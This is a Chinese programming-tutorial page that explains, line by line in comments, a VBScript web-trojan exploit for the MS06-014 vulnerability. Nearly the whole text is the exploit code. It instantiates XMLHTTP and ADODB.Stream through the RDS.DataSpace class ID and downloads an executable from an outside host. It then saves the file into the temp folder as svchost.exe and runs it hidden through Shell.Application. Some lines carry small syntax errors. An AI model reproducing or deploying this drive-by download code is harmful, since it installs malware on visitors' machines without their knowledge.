VB.net 2010 视频教程 VB.net 2010 视频教程 python基础视频教程
SQL Server 2008 视频教程 c#入门经典教程 Visual Basic从门到精通视频教程
当前位置:
首页 > 编程开发 > vb >
  • MS06014网马脚本解释

Set df = document.createElement("object") '创建项目
 df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" '对项目进行36位全球唯一码编号
 Set x = df.CreateObject("Microsoft.XMLHTTP,"") '创建一个XMLHTTP项目(用来传输数据)
 set SS = df.createobject("ADODB.Stream","") '创建一个ADOBD数据流格式(数据媒介)
 SS.type = 1 '类型.1好像是2进制.具体忘了
 x.Open Get, "http://fxfqiao.com/laopo/1.exe", False '打开远程文件,这个就是木马文件了
 x.Send '发送
 set F = df.createobject("Scripting.FileSystemObject","") '创建一个文件项目(用来把数据流还原成文件)
 set tmp = F.GetSpecialFolder(2) '这句好像是获得文件夹
 SS.open ''
 fname1= F.BuildPath(tmp,"svchost.exe") '注入到svchost.exe
 SS.write x.responseBody '把远程文件写入数据流中
 SS.savetofile fname1,2 '把数据流存为文件.并且是直接写到svchost.exe的Hook好像,到这里.你的机器已经中毒
 set Q = df.createobject(Shell.Application,"") '创建一个Shell
 Q.ShellExecute fname1,"","","open",0 '到这里.你的病毒开始发挥作用

相关教程